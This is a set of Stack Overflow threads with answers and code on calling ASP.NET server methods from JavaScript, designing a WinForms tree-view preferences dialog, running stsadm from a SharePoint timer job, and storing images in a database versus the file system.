WITHIN GROUP (ORDER BY response_time)
FROM pageviews;
Source: http://www.craigkerstiens.com/2014/02/02/Examining-PostgreSQL-9.4/
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3682",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "12"
} |
Q: Call ASP.NET function from JavaScript? I'm writing a web page in ASP.NET. I have some JavaScript code, and I have a submit button with a click event.
Is it possible to call a method I created in ASP with JavaScript's click event?
A: Well, if you don't want to do it using Ajax or any other way and just want a normal ASP.NET postback to happen, here is how you do it (without using any other libraries):
It is a little tricky though... :)
i. In your code file (assuming you are using C# and .NET 2.0 or later) add the following Interface to your Page class to make it look like
public partial class Default : System.Web.UI.Page, IPostBackEventHandler{}
ii. This should add (using Tab-Tab) this function to your code file:
public void RaisePostBackEvent(string eventArgument) { }
iii. In your onclick event in JavaScript, write the following code:
var pageId = '<%= Page.ClientID %>';
__doPostBack(pageId, argumentString);
This will call the 'RaisePostBackEvent' method in your code file with the 'eventArgument' as the 'argumentString' you passed from the JavaScript. Now, you can call any other event you like.
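As a sketch, the RaisePostBackEvent stub from step ii might dispatch on that argument like this (the argument value here is purely illustrative):
public void RaisePostBackEvent(string eventArgument)
{
    // eventArgument is the argumentString passed from __doPostBack in JavaScript
    if (eventArgument == "SaveClicked")
    {
        // Call whatever server-side logic you need here
    }
}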
P.S: That is 'underscore-underscore-doPostBack' ... And, there should be no space in that sequence... Somehow the WMD does not allow me to write two underscores followed by a character!
A: The __doPostBack() method works well.
Another solution (very hackish) is to simply add an invisible ASP button in your markup and click it with a JavaScript method.
<div style="display: none;">
<asp:Button runat="server" ... OnClick="ButtonClickHandlerMethod" />
</div>
From your JavaScript, retrieve the reference to the button using its ClientID and then call the .click() method on it.
var button = document.getElementById(/* button client id */);
button.click();
A: I think blog post How to fetch & show SQL Server database data in ASP.NET page using Ajax (jQuery) will help you.
JavaScript Code
<script src="http://code.jquery.com/jquery-3.3.1.js"></script>
<script language="javascript" type="text/javascript">
function GetCompanies() {
$("#UpdatePanel").html("<div style='text-align:center; background-color:yellow; border:1px solid red; padding:3px; width:200px'>Please Wait...</div>");
$.ajax({
type: "POST",
url: "Default.aspx/GetCompanies",
data: "{}",
dataType: "json",
contentType: "application/json; charset=utf-8",
success: OnSuccess,
error: OnError
});
}
function OnSuccess(data) {
var TableContent = "<table border='0'>" +
"<tr>" +
"<td>Rank</td>" +
"<td>Company Name</td>" +
"<td>Revenue</td>" +
"<td>Industry</td>" +
"</tr>";
for (var i = 0; i < data.d.length; i++) {
TableContent += "<tr>" +
"<td>"+ data.d[i].Rank +"</td>" +
"<td>"+data.d[i].CompanyName+"</td>" +
"<td>"+data.d[i].Revenue+"</td>" +
"<td>"+data.d[i].Industry+"</td>" +
"</tr>";
}
TableContent += "</table>";
$("#UpdatePanel").html(TableContent);
}
function OnError(data) {
}
</script>
ASP.NET Server Side Function
[WebMethod]
[ScriptMethod(ResponseFormat= ResponseFormat.Json)]
public static List<TopCompany> GetCompanies()
{
System.Threading.Thread.Sleep(5000);
List<TopCompany> allCompany = new List<TopCompany>();
using (MyDatabaseEntities dc = new MyDatabaseEntities())
{
allCompany = dc.TopCompanies.ToList();
}
return allCompany;
}
A: Static, strongly-typed programming has always felt very natural to me, so at first I resisted learning JavaScript (not to mention HTML and CSS) when I had to build web-based front-ends for my applications. I would do anything to work around this like redirecting to a page just to perform and action on the OnLoad event, as long as I could code pure C#.
You will find however that if you are going to be working with websites, you must have an open mind and start thinking more web-oriented (that is, don't try to do client-side things on the server and vice-versa). I love ASP.NET webforms and still use it (as well as MVC), but I will say that by trying to make things simpler and hiding the separation of client and server it can confuse newcomers and actually end up making things more difficult at times.
My advice is to learn some basic JavaScript (how to register events, retrieve DOM objects, manipulate CSS, etc.) and you will find web programming much more enjoyable (not to mention easier). A lot of people mentioned different Ajax libraries, but I didn't see any actual Ajax examples, so here it goes. (If you are not familiar with Ajax, all it is, is making an asynchronous HTTP request to refresh content (or perhaps perform a server-side action in your scenario) without reloading the entire page or doing a full postback.
Client-Side:
<script type="text/javascript">
var xmlhttp = new XMLHttpRequest(); // Create object that will make the request
xmlhttp.open("GET", "http://example.org/api/service", true); // configure object (method, URL, async)
xmlhttp.onreadystatechange = function() { // Register a function to run when the state changes; if the request has finished and the status code is 200 (OK), write the result to <p>
    if (xmlhttp.readyState == 4 && xmlhttp.status == 200) {
        document.getElementById("resultText").innerHTML = xmlhttp.responseText;
    }
};
xmlhttp.send(); // Send request
</script>
That's it. Although the name can be misleading, the result can be plain text or JSON as well; you are not limited to XML. jQuery provides an even simpler interface for making Ajax calls (among other JavaScript tasks it simplifies).
The request can be an HTTP-POST or HTTP-GET and does not have to be to a webpage, but you can post to any service that listens for HTTP requests such as a RESTful API. The ASP.NET MVC 4 Web API makes setting up the server-side web service to handle the request a breeze as well. But many people do not know that you can also add API controllers to a web forms project and use them to handle Ajax calls like this.
Server-Side:
public class DataController : ApiController
{
public HttpResponseMessage<string[]> Get()
{
HttpResponseMessage<string[]> response = new HttpResponseMessage<string[]>(
Repository.Get(true),
new MediaTypeHeaderValue("application/json")
);
return response;
}
}
Global.asax
Then just register the HTTP route in your Global.asax file, so ASP.NET will know how to direct the request.
void Application_Start(object sender, EventArgs e)
{
RouteTable.Routes.MapHttpRoute("Service", "api/{controller}/{id}");
}
With AJAX and Controllers, you can post back to the server at any time asynchronously to perform any server side operation. This one-two punch provides both the flexibility of JavaScript and the power the C# / ASP.NET, giving the people visiting your site a better overall experience. Without sacrificing anything, you get the best of both worlds.
References
*
*Ajax,
*jQuery Ajax,
*Controller in Webforms
A:
The Microsoft AJAX library will accomplish this. You could also create your own solution that involves using AJAX to call your own aspx (as basically) script files to run .NET functions.
This is the library called AjaxPro which was written an MVP named Michael Schwarz. This was library was not written by Microsoft.
I have used AjaxPro extensively, and it is a very nice library, that I would recommend for simple callbacks to the server. It does function well with the Microsoft version of Ajax with no issues. However, I would note, with how easy Microsoft has made Ajax, I would only use it if really necessary. It takes a lot of JavaScript to do some really complicated functionality that you get from Microsoft by just dropping it into an update panel.
A: It is so easy for both scenarios (that is, synchronous/asynchronous) if you want to trigger a server-side event handler, for example, Button's click event.
For triggering an event handler of a control:
If you added a ScriptManager on your page already then skip step 1.
*
*Add the following in your page client script section
//<![CDATA[
var theForm = document.forms['form1'];
if (!theForm) {
theForm = document.form1;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
*Write your server-side event handler for your control
protected void btnSayHello_Click(object sender, EventArgs e)
{
Label1.Text = "Hello World...";
}
*Add a client function to call the server side event handler
function SayHello() {
__doPostBack("btnSayHello", "");
}
Replace the "btnSayHello" in code above with your control's client id.
By doing so, if your control is inside an update panel, the page will not refresh. That is so easy.
One other thing to say: be careful with the client ID, because it depends on your ID-generation policy, defined with the ClientIDMode property.
A:
I'm trying to implement this but it's not working right. The page is
posting back, but my code isn't getting executed. When i debug the
page, the RaisePostBackEvent never gets fired. One thing i did
differently is I'm doing this in a user control instead of an aspx
page.
If anyone else is like Merk, and having trouble over coming this, I have a solution:
When you have a user control, it seems you must also create the PostBackEventHandler in the parent page. And then you can invoke the user control's PostBackEventHandler by calling it directly. See below:
public void RaisePostBackEvent(string _arg)
{
UserControlID.RaisePostBackEvent(_arg);
}
Where UserControlID is the ID you gave the user control on the parent page when you nested it in the mark up.
Note: You can also simply just call methods belonging to that user control directly (in which case, you would only need the RaisePostBackEvent handler in the parent page):
public void RaisePostBackEvent(string _arg)
{
UserControlID.method1();
UserControlID.method2();
}
A: The Microsoft AJAX library will accomplish this. You could also create your own solution that involves using AJAX to call your own .aspx pages (acting basically as script files) to run .NET functions.
I suggest the Microsoft AJAX library. Once installed and referenced, you just add a line in your page load or init:
Ajax.Utility.RegisterTypeForAjax(GetType(YOURPAGECLASSNAME))
Then you can do things like:
<Ajax.AjaxMethod()> _
Public Function Get5() AS Integer
Return 5
End Function
Then, you can call it on your page as:
PageClassName.Get5(javascriptCallbackFunction);
The last parameter of your function call must be the javascript callback function that will be executed when the AJAX request is returned.
A: You can do it asynchronously using .NET Ajax PageMethods. See here or here.
A: You might want to create a web service for your common methods.
Just add a WebMethodAttribute over the functions you want to call, and that's about it.
Having a web service with all your common stuff also makes the system easier to maintain.
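As a rough sketch (the class and method names here are made up for illustration), a script-callable ASMX service might look like this; the ScriptService attribute is what lets ASP.NET AJAX call it from client script:
[System.Web.Services.WebService(Namespace = "http://example.org/")]
[System.Web.Script.Services.ScriptService]
public class CommonService : System.Web.Services.WebService
{
    [System.Web.Services.WebMethod]
    public string GetServerTime()
    {
        // Any common server-side logic can live here
        return DateTime.Now.ToString("s");
    }
}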
A: If the __doPostBack function is not generated on the page you need to insert a control to force it like this:
<asp:Button ID="btnJavascript" runat="server" UseSubmitBehavior="false" />
A: Regarding:
var button = document.getElementById(/* Button client id */);
button.click();
It should be like:
var button = document.getElementById('<%=formID.ClientID%>');
Where formID is the ASP.NET control ID in the .aspx file.
A: Add this line to page load if you are getting an "object expected" error.
ClientScript.GetPostBackEventReference(this, "");
A: You can use PageMethods.<YourMethodName> in order to call C# or VB.NET methods from JavaScript.
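For illustration, a minimal sketch (the page and method names are hypothetical, and the page needs a ScriptManager with EnablePageMethods="true"): a page method is just a static method in the code-behind marked with WebMethod:
public partial class MyPage : System.Web.UI.Page
{
    [System.Web.Services.WebMethod]
    public static string GetGreeting(string name)
    {
        // Callable from client script as PageMethods.GetGreeting(name, onSuccess)
        return "Hello, " + name;
    }
}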
A: Try this:
if(!ClientScript.IsStartupScriptRegistered("window"))
{
Page.ClientScript.RegisterStartupScript(this.GetType(), "window", "pop();", true);
}
Or this
Response.Write("<script>alert('Hello World');</script>");
Use the OnClientClick property of the button to call JavaScript functions...
A: You can also get it by just adding this line in your JavaScript code:
document.getElementById('<%=btnName.ClientID%>').click()
I think this one is very much easy!
A: Please try this:
<%= Page.ClientScript.GetPostBackEventReference(ddlVoucherType, String.Empty) %>;
ddlVoucherType is the control whose selected-index change triggers the postback... and you can put any function in the SelectedIndexChanged handler of this control.
A: The simplest and best way to achieve this is to use the onmouseup() JavaScript event rather than onclick()
That way you will fire JavaScript after you click and it won't interfere with the ASP OnClick() event.
A: I tried this so that I could run an ASP.NET method while using jQuery.
*
*Do a page redirect in your jQuery code
window.location = "Page.aspx?key=1";
*Then use a Query String in Page Load
protected void Page_Load(object sender, EventArgs e)
{
if (Request.QueryString["key"] != null)
{
string key= Request.QueryString["key"];
if (key=="1")
{
// Some code
}
}
}
So there is no need to run any extra code
A: This approach works like a breeze for me, and it is cross-browser:
The __doPostBack() method works well.
Another solution (very hackish) is to simply add an invisible ASP button in your markup and click it with a JavaScript method.
<div style="display: none;">
<asp:Button runat="server" ... OnClick="ButtonClickHandlerMethod" />
</div>
From your JavaScript, retrieve the reference to the button using its ClientID and then call the .Click() method on it:
var button = document.getElementById(/* button client id */);
button.click();
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3713",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "146"
} |
Q: How to create a tree-view preferences dialog type of interface in C#? I'm writing an application that is basically just a preferences dialog, much like the tree-view preferences dialog that Visual Studio itself uses. The function of the application is simply a pass-through for data from a serial device to a file. It performs many, many transformations on the data before writing it to the file, so the GUI for the application is simply all the settings that dictate what those transformations should be.
What's the best way to go about designing/coding a tree-view preferences dialog? The way I've been going about it is building the main window with a docked tree control on the left. Then I have been creating container controls that correspond to each node of the tree. When a node is selected, the app brings that node's corresponding container control to the front, moves it to the right position, and maximizes it in the main window. This seems really, really clunky while designing it. It basically means I have tons of container controls beyond the edge of the main window during design time that I have to keep scrolling the main window over to in order to work with them. I don't know if this totally makes sense the way I'm writing this, but maybe this visual for what I'm talking about will make more sense:
Basically I have to work with this huge form, with container controls all over the place, and then do a bunch of run-time reformatting to make it all work. This seems like a lot of extra work. Am I doing this in a totally stupid way? Is there some "obvious" easier way of doing this that I'm missing?
A: Greg Hurlman wrote:
Why not just show/hide the proper container when a node is selected in the grid? Have the containers all sized appropriately in the same spot, and hide all but the default, which would be preselected in the grid on load.
Unfortunately, that's what I'm trying to avoid. I'm looking for an easy way to handle the interface during design time, with minimal reformatting code needed to get it working during run time.
I like Duncan's answer because it means the design of each node's interface can be kept completely separate. This means I don't get overlap on the snapping guidelines and other design time advantages.
A: A tidier way is to create separate forms for each 'pane' and, in each form constructor, set
this.TopLevel = false;
this.FormBorderStyle = FormBorderStyle.None;
this.Dock = DockStyle.Fill;
That way, each of these forms can be laid out in its own designer, instantiated one or more times at runtime, and added to the empty area like a normal control.
Perhaps the main form could use a SplitContainer with a static TreeView in one panel, and space to add these forms in the other. Once they are added, they could be flipped through using Hide/Show or BringToFront/SendToBack methods.
SeparateForm f = new SeparateForm();
MainFormSplitContainer.Panel2.Controls.Add(f);
f.Show();
A: I would probably create several panel classes based on a base class inheriting CustomControl. These controls would then have methods like Save/Load and stuff like that. That way I can design each of these panels separately.
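A minimal sketch of that idea (the Settings type and member names are illustrative, not from the original post, and UserControl is used here for simplicity):
// Common base class so the dialog can treat all panels uniformly
public abstract class PreferencesPanel : UserControl
{
    public abstract void LoadSettings(Settings settings); // populate controls from settings
    public abstract void SaveSettings(Settings settings); // write control values back
}

// When a tree node is selected, swap the matching panel into the host area
private void ShowPanel(PreferencesPanel panel)
{
    panelHost.Controls.Clear();
    panel.Dock = DockStyle.Fill;
    panelHost.Controls.Add(panel);
}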
I have used a Wizard control that, in design mode, handled several pages, so that one could click Next in the designer and design all the pages at once through the designer. Though this had several disadvantages when connecting code to the controls, it probably means that you could have a similar setup by building some designer classes. I have never written any designer classes in VS myself, so I can't say how, or if it's worth it :-)
I'm a little curious about how you intend to handle the load/save of values to/from the controls. There must be a lot of code in one class if all your pages are in one big form?
And yet another way would of course be to generate the gui code as each page is requested, using info about what type of settings there are.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3725",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "18"
} |
Q: Sharepoint: executing stsadm from a timer job + SHAREPOINT\System rights I have an unusual situation in which I need a SharePoint timer job to both have local administrator windows privileges and to have SHAREPOINT\System SharePoint privileges.
I can get the windows privileges by simply configuring the timer service to use an account which is a member of local administrators. I understand that this is not a good solution since it gives SharePoint timer service more rights then it is supposed to have. But it at least allows my SharePoint timer job to run stsadm.
Another problem with running the timer service under local administrator is that this user won't necessarily have SHAREPOINT\System SharePoint privileges, which I also need for this SharePoint job. It turns out that SPSecurity.RunWithElevatedPrivileges won't work in this case. Reflector shows that RunWithElevatedPrivileges checks if the current process is owstimer (the service process which runs SharePoint jobs) and performs no elevation if this is the case (the rationale here, I guess, is that the timer service is supposed to run under the NT AUTHORITY\NetworkService windows account, which has SHAREPOINT\System SharePoint privileges, and thus there's no need to elevate privileges for a timer job).
The only possible solution here seems to be to run the timer service under its usual NetworkService windows account and to run stsadm as a local administrator by storing the administrator credentials somewhere and passing them to System.Diagnostics.Process.Start() through the StartInfo's UserName, Domain and Password.
It seems everything should work now, but here is another problem I'm stuck with at the moment. Stsadm is failing with the following error popup (!) (Winternals Filemon shows that stsadm is running under the administrator in this case):
The application failed to initialize properly (0xc0000142).
Click OK to terminate the application.
Event Viewer registers nothing except the popup.
The local administrator user is my account and when I just run stsadm interactively under this account everything is ok. It also works fine when I configure the timer service to run under this account.
Any suggestions are appreciated :)
A: I'm not at work so this is off the top of my head, but: If you get a reference to the Site, can you try to create a new SPSite with the SYSTEM-UserToken?
SPUserToken sut = thisSite.RootWeb.AllUsers[@"SHAREPOINT\SYSTEM"].UserToken;
using (SPSite syssite = new SPSite(thisSite.Url, sut))
{
    // Do what you have to do
}
A: Other applications, if run this way (i.e. from a timer job with explicit credentials), fail the same way with "The application failed to initialize properly". I just wrote a simple app which takes the path of another executable and its arguments as parameters, and when run from that timer job it fails the same way.
internal class ExternalProcess
{
public static void run(String executablePath, String workingDirectory, String programArguments, String domain, String userName,
String password, out Int32 exitCode, out String output)
{
Process process = new Process();
process.StartInfo.UseShellExecute = false;
process.StartInfo.RedirectStandardError = true;
process.StartInfo.RedirectStandardOutput = true;
StringBuilder outputString = new StringBuilder();
Object synchObj = new object();
DataReceivedEventHandler outputAppender =
delegate(Object sender, DataReceivedEventArgs args)
{
lock (synchObj)
{
outputString.AppendLine(args.Data);
}
};
process.OutputDataReceived += outputAppender;
process.ErrorDataReceived += outputAppender;
process.StartInfo.FileName = @"C:\AppRunner.exe";
process.StartInfo.WorkingDirectory = workingDirectory;
process.StartInfo.Arguments = @"""" + executablePath + @""" " + programArguments;
process.StartInfo.UserName = userName;
process.StartInfo.Domain = domain;
SecureString passwordString = new SecureString();
foreach (Char c in password)
{
passwordString.AppendChar(c);
}
process.StartInfo.Password = passwordString;
process.Start();
process.BeginOutputReadLine();
process.BeginErrorReadLine();
process.WaitForExit();
exitCode = process.ExitCode;
output = outputString.ToString();
}
}
AppRunner basically does the same as the above fragment, but without username and password
A: The SharePoint timer job runs with the SharePoint farm admin credentials, since the information goes into the SharePoint config database. Thus the application pool account will not have access.
For testing the timer job in a dev environment, we can temporarily change the application pool account to the application pool account being used for Central Administration.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3739",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "8"
} |
Q: Storing Images in DB - Yea or Nay? So I'm using an app that stores images heavily in the DB. What's your outlook on this? I'm more of a type to store the location in the filesystem, than store it directly in the DB.
What do you think are the pros/cons?
A: File store. Facebook engineers had a great talk about it. One takeaway was to know the practical limit of files in a directory.
Needle in a Haystack: Efficient Storage of Billions of Photos
A: I'm not sure how much of a "real world" example this is, but I currently have an application out there that stores details for a trading card game, including the images for the cards. Granted the record count for the database is only 2851 records to date, but given the fact that certain cards are released multiple times and have alternate artwork, it was actually more efficient size-wise to scan the "primary square" of the artwork and then dynamically generate the border and miscellaneous effects for the card when requested.
The original creator of this image library created a data access class that renders the image based on the request, and it does it quite fast for viewing an individual card.
This also eases deployment/updates when new cards are released, instead of zipping up an entire folder of images and sending those down the pipe and ensuring the proper folder structure is created, I simply update the database and have the user download it again. This currently sizes up to 56MB, which isn't great, but I'm working on an incremental update feature for future releases. In addition, there is a "no images" version of the application that allows those over dial-up to get the application without the download delay.
This solution has worked great to date since the application itself is targeted as a single instance on the desktop. There is a web site where all of this data is archived for online access, but I would in no way use the same solution for this. I agree the file access would be preferable because it would scale better to the frequency and volume of requests being made for the images.
Hopefully this isn't too much babble, but I saw the topic and wanted to provide some of my insights from a relatively successful small/medium scale application.
A: SQL Server 2008 offers a solution that has the best of both worlds : The filestream data type.
Manage it like a regular table and have the performance of the file system.
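A rough sketch of reading FILESTREAM data from C# (the table and column names are assumptions; FILESTREAM access must happen inside a transaction, and SqlFileStream lives in System.Data.SqlTypes):
using (var conn = new SqlConnection(connectionString))
{
    conn.Open();
    using (var tx = conn.BeginTransaction())
    {
        var cmd = new SqlCommand(
            "SELECT ImageData.PathName(), GET_FILESTREAM_TRANSACTION_CONTEXT() " +
            "FROM Images WHERE Id = @id", conn, tx);
        cmd.Parameters.AddWithValue("@id", imageId);
        using (var reader = cmd.ExecuteReader())
        {
            if (reader.Read())
            {
                string path = reader.GetString(0);   // logical path to the blob
                var txContext = (byte[])reader[1];   // transaction context for the stream
                using (var fs = new SqlFileStream(path, txContext, FileAccess.Read))
                {
                    // Stream fs to the response, a file, an image decoder, etc.
                }
            }
        }
        tx.Commit();
    }
}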
A: It depends on the number of images you are going to store and also their sizes. I have used databases to store images in the past and my experience has been fairly good.
IMO, Pros of using database to store images are,
A. You don't need an FS structure to hold your images
B. Database indexes perform better than FS trees when a larger number of items is to be stored
C. A smartly tuned database does a good job of caching query results
D. Backups are simple. It also works well if you have replication set up and content is delivered from a server near the user. In such cases, explicit synchronization is not required.
If your images are going to be small (say < 64k) and the storage engine of your db supports inline (in record) BLOBs, it improves performance further as no indirection is required (Locality of reference is achieved).
Storing images may be a bad idea when you are dealing with a small number of huge images. Another problem with storing images in the DB is that metadata like creation and modification dates must be handled by your application.
A: I have recently created a PHP/MySQL app which stores PDFs/Word files in a MySQL table (as big as 40MB per file so far).
Pros:
*
*Uploaded files are replicated to the backup server along with everything else; no separate backup strategy is needed (peace of mind).
*Setting up the web server is slightly simpler because I don't need to have an uploads/ folder and tell all my applications where it is.
*I get to use transactions for edits to improve data integrity - I don't have to worry about orphaned and missing files
Cons:
*
*mysqldump now takes a looooong time because there is 500MB of file data in one of the tables.
*Overall not very memory/cpu efficient when compared to filesystem
I'd call my implementation a success, it takes care of backup requirements and simplifies the layout of the project. The performance is fine for the 20-30 people who use the app.
A: In my experience I had to manage both situations: images stored in the database and images on the file system with the path stored in the DB.
The first solution, images in the database, is somewhat "cleaner", as your data access layer will have to deal only with database objects; but it is good only when you have to deal with low volumes.
Obviously database access performance degrades when you deal with binary large objects, and the database size will grow a lot, causing performance loss again... and normally database space is much more expensive than file system space.
On the other hand having large binary objects stored in file system will cause you to have backup plans that have to consider both database and file system, and this can be an issue for some systems.
Another reason to go for the file system is when you have to share your image data (or sounds, video, whatever) with third-party access: these days I'm developing a web app that uses images that have to be accessed from "outside" my web farm, in such a way that database access to retrieve binary data is simply impossible. So sometimes there are also design considerations that will drive you to a choice.
Consider also, when making this choice, if you have to deal with permissions and authentication when accessing binary objects: these requirements can normally be solved more easily when the data is stored in the DB.
A: This might be a bit of a long shot, but if you're using (or planning on using) SQL Server 2008 I'd recommend having a look at the new FileStream data type.
FileStream solves most of the problems around storing the files in the DB:
*
*The Blobs are actually stored as files in a folder.
*The Blobs can be accessed using either a database connection or over the filesystem.
*Backups are integrated.
*Migration "just works".
However SQL's "Transparent Data Encryption" does not encrypt FileStream objects, so if that is a consideration, you may be better off just storing them as varbinary.
From the MSDN Article:
Transact-SQL statements can insert, update, query, search, and back up FILESTREAM data. Win32 file system interfaces provide streaming access to the data.
FILESTREAM uses the NT system cache for caching file data. This helps reduce any effect that FILESTREAM data might have on Database Engine performance. The SQL Server buffer pool is not used; therefore, this memory is available for query processing.
A: I once worked on an image processing application. We stored the uploaded images in a directory that was something like /images/[today's date]/[id number]. But we also extracted the metadata (exif data) from the images and stored that in the database, along with a timestamp and such.
A: In a previous project i stored images on the filesystem, and that caused a lot of headaches with backups, replication, and the filesystem getting out of sync with the database.
In my latest project i'm storing images in the database, and caching them on the filesystem, and it works really well. I've had no problems so far.
A: File paths in the DB is definitely the way to go - I've heard story after story from customers with TB of images that it became a nightmare trying to store any significant amount of images in a DB - the performance hit alone is too much.
A: I'm in charge of some applications that manage many TB of images. We've found that storing file paths in the database to be best.
There are a couple of issues:
*
*database storage is usually more expensive than file system storage
*you can super-accelerate file system access with standard off the shelf products
*
*for example, many web servers use the operating system's sendfile() system call to asynchronously send a file directly from the file system to the network interface. Images stored in a database don't benefit from this optimization.
*things like web servers, etc, need no special coding or processing to access images in the file system
*databases win out where transactional integrity between the image and metadata are important.
*
*it is more complex to manage integrity between db metadata and file system data
*it is difficult (within the context of a web application) to guarantee data has been flushed to disk on the filesystem
A: In my experience, sometimes the simplest solution is to name the images according to the primary key. So it's easy to find the image that belongs to a particular record, and vice versa. But at the same time you're not storing anything about the image in the database.
A: The trick here is to not become a zealot.
One thing to note here is that no one in the pro file system camp has listed a particular file system. Does this mean that everything from FAT16 to ZFS handily beats every database?
No.
The truth is that many databases beat many files systems, even when we're only talking about raw speed.
The correct course of action is to make the right decision for your precise scenario, and to do that, you'll need some numbers and some use case estimates.
A: In places where you MUST guarantee referential integrity and ACID compliance, storing images in the database is required.
You cannot transactionally guarantee that the image and the metadata about that image stored in the database refer to the same file. In other words, it is impossible to guarantee that the file on the filesystem is only ever altered at the same time and in the same transaction as the metadata.
A: Second the recommendation on file paths. I've worked on a couple of projects that needed to manage large-ish asset collections, and any attempts to store things directly in the DB resulted in pain and frustration long-term.
The only real "pro" I can think of regarding storing them in the DB is the potential for easy of individual image assets. If there are no file paths to use, and all images are streamed straight out of the DB, there's no danger of a user finding files they shouldn't have access to.
That seems like it would be better solved with an intermediary script pulling data from a web-inaccessible file store, though. So the DB storage isn't REALLY necessary.
A: The word on the street is that unless you are a database vendor trying to prove that your database can do it (like, let's say Microsoft boasting about Terraserver storing a bajillion images in SQL Server) it's not a very good idea. When the alternative - storing images on file servers and paths in the database is so much easier, why bother? Blob fields are kind of like the off-road capabilities of SUVs - most people don't use them, those who do usually get in trouble, and then there are those who do, but only for the fun of it.
A: Storing an image in the database still means that the image data ends up somewhere in the file system but obscured so that you cannot access it directly.
+ves:
*
*database integrity
*it's easy to manage since you don't have to worry about keeping the filesystem in sync when an image is added or deleted
-ves:
*
*performance penalty -- a database lookup is usually slower than a filesystem lookup
*you cannot edit the image directly (crop, resize)
Both methods are common and practiced. Have a look at the advantages and disadvantages. Either way, you'll have to think about how to overcome the disadvantages. Storing in database usually means tweaking database parameters and implement some kind of caching. Using filesystem requires you to find some way of keeping filesystem+database in sync.
A: As others have said, SQL 2008 comes with a FILESTREAM type that allows you to store a filename or identifier as a pointer in the DB while automatically storing the image on your filesystem, which is a great scenario.
If you're on an older database, then I'd say that if you're storing it as blob data, then you're really not going to get anything out of the database in the way of searching features, so it's probably best to store an address on a filesystem, and store the image that way.
That way you also save space on your filesystem, as you are only going to save the exact amount of space, or even compacted space on the filesystem.
Also, you could decide to save with some structure or elements that allow you to browse the raw images in your filesystem without any db hits, or transfer the files in bulk to another system, hard drive, S3 or another scenario - updating the location in your program, but keep the structure, again without much of a hit trying to bring the images out of your db when trying to increase storage.
Probably, it would also allow you to throw some caching element, based on commonly hit image urls into your web engine/program, so you're saving yourself there as well.
A: Small static images (not more than a couple of megs) that are not frequently edited, should be stored in the database. This method has several benefits including easier portability (images are transferred with the database), easier backup/restore (images are backed up with the database) and better scalability (a file system folder with thousands of little thumbnail files sounds like a scalability nightmare to me).
Serving up images from a database is easy, just implement an http handler that serves the byte array returned from the DB server as a binary stream.
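A minimal sketch of such a handler (the connection string name, table, and column names are assumptions):
using System.Configuration;
using System.Data.SqlClient;
using System.Web;

public class ImageHandler : IHttpHandler
{
    public void ProcessRequest(HttpContext context)
    {
        int id = int.Parse(context.Request.QueryString["id"]);
        using (var conn = new SqlConnection(
            ConfigurationManager.ConnectionStrings["Db"].ConnectionString))
        using (var cmd = new SqlCommand(
            "SELECT ImageData FROM Images WHERE Id = @id", conn))
        {
            cmd.Parameters.AddWithValue("@id", id);
            conn.Open();
            var data = (byte[])cmd.ExecuteScalar();
            context.Response.ContentType = "image/jpeg"; // or store the type in the DB
            context.Response.BinaryWrite(data);
        }
    }

    public bool IsReusable
    {
        get { return true; }
    }
}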
A: Here's an interesting white paper on the topic.
To BLOB or Not To BLOB: Large Object Storage in a Database or a Filesystem
The answer is "It depends." Certainly it would depend upon the database server and its approach to blob storage. It also depends on the type of data being stored in blobs, as well as how that data is to be accessed.
Smaller sized files can be efficiently stored and delivered using the database as the storage mechanism. Larger files would probably be best stored using the file system, especially if they will be modified/updated often. (blob fragmentation becomes an issue in regards to performance.)
Here's an additional point to keep in mind. One of the reasons supporting the use of a database to store the blobs is ACID compliance. However, the approach that the testers used in the white paper (the Bulk Logged option of SQL Server), which doubled SQL Server throughput, effectively changed the 'D' in ACID to a 'd', as the blob data was not logged with the initial writes for the transaction. Therefore, if full ACID compliance is an important requirement for your system, halve the SQL Server throughput figures for database writes when comparing file I/O to database blob I/O.
A: One thing that I haven't seen anyone mention yet but is definitely worth noting is that there are issues associated with storing large amounts of images in most filesystems too. For example if you take the approach mentioned above and name each image file after the primary key, on most filesystems you will run into issues if you try to put all of the images in one big directory once you reach a very large number of images (e.g. in the hundreds of thousands or millions).
One common solution to this is to hash them out into a balanced tree of subdirectories.
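A minimal sketch of the bucketing idea in C# (the two-level scheme and the file extension are illustrative):
using System.IO;

static string GetImagePath(string root, int imageId)
{
    // Spread files across 256 x 256 buckets so no single directory grows unbounded
    string hash = imageId.ToString("x8");   // e.g. 123456 -> "0001e240"
    string bucket1 = hash.Substring(0, 2);  // "00"
    string bucket2 = hash.Substring(2, 2);  // "01"
    return Path.Combine(root, bucket1, bucket2, imageId + ".jpg");
}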
A: Something nobody has mentioned is that the DB guarantees atomic actions, transactional integrity and deals with concurrency. Even referential integrity is out the window with a filesystem - so how do you know your file names are really still correct?
If you have your images in a file-system and someone is reading the file as you're writing a new version or even deleting the file - what happens?
We use blobs because they're easier to manage (backup, replication, transfer) too. They work well for us.
A: The problem with storing only file paths to images in a database is that the database's integrity can no longer be enforced.
If the actual image pointed to by the filepath becomes unavailable, the database unwittingly has an integrity error.
Given that the images are the actual data being sought after, and that they can be managed easier (the images won't suddenly disappear) in one integrated database rather than having to interface with some kind of filesystem (if the filesystem is independently accessed, the images MIGHT suddenly "disappear"), I'd go for storing them directly as a BLOB or such.
A: I'm the lead developer on an enterprise document management system in which some customers store hundreds of gigabytes of documents. Terabytes in the not too distant future. We use the file system approach for many of the reasons mentioned on this page plus another: archiving.
Many of our customers must conform to industry specific archival rules, such as storage to optical disk or storage in a non-proprietary format. Plus, you have the flexibility of simply adding more disks to a NAS device. If you have your files stored in your database, even with SQL Server 2008's file stream data type, your archival options just became a whole lot narrower.
A: At a company where I used to work we stored 155 million images in an Oracle 8i (then 9i) database. 7.5TB worth.
A: As with most issues, it's not as simple as it sounds. There are cases where it would make sense to store the images in the database.
*

*You are storing images that are changing dynamically, say invoices, and you want to get an invoice as it was on 1 Jan 2007
*The government wants you to maintain 6 years of history
*Images stored in the database do not require a different backup strategy. Images stored on the filesystem do
